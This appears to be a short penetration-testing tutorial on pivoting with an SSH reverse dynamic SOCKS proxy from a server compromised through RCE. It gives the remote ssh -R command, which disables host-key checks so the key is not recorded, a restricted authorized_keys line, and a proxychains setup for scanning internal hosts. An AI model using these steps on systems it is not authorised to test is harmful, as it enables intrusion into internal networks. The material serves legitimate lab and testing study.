In a SSH reverse dynamic proxy, a remote host connects to a local host over SSH to give the local host access to the remote network with a SOCKS proxy. An SSH reverse proxy can be set up with an RCE on a compromised server in the following manner (Set up = solid lines, Usage = dotted lines):

graph TD
    subgraph Pivot
        remote_web[Web on 80] -->|RCE|remote_sshclient[SSH Client]
    end
    
    subgraph Local
        local_ssh[SSH on 22] -->|creates| local_socks[SOCKS Proxy]
        nmap[Nmap] -.->|proxychains| local_socks
    end

    subgraph Target2 [Target 2]
        target_web[Web on 80]
    end

    subgraph Target1 [Target 1]
        target_samba[SMB on 445]
    end

    remote_sshclient -->|proxy setup| local_ssh
    local_socks -.-> local_ssh -.-> remote_sshclient -.-> target_web & target_samba

Demonstration

Start the SSH server on the local machine.

Create a SSH key on the remote machine with access to that network and add to the local user’s authorized_keys files with extra options to restrict access to tunnelling/proxy only (replace $REMOTE_IP and the key itself):

from="$REMOTE_IP",command="false",no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC4cjmvS... mysql@zora

Run the command below on the remote machine to start a SOCKS proxy server on the local machine:

ssh -f -N -R $local_port -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" $local_user@$local_host
  • -f: run in background
  • -N: do not try to start a shell
  • -R $local_port: since it only specifies a local port but not the remote port/address, this option instructs the SSH server to start SOCKS proxy server on $local_port; -R can also be used to create an SSH reverse tunnel
  • The -o options removes user interaction and avoids recording the host key

The proxy server can then be used in places like a browser. It can also be used in proxychains by editing /etc/proxychains4.conf (assuming that local port is 1080):

[ProxyList]
# ...
socks4 127.0.0.1 1080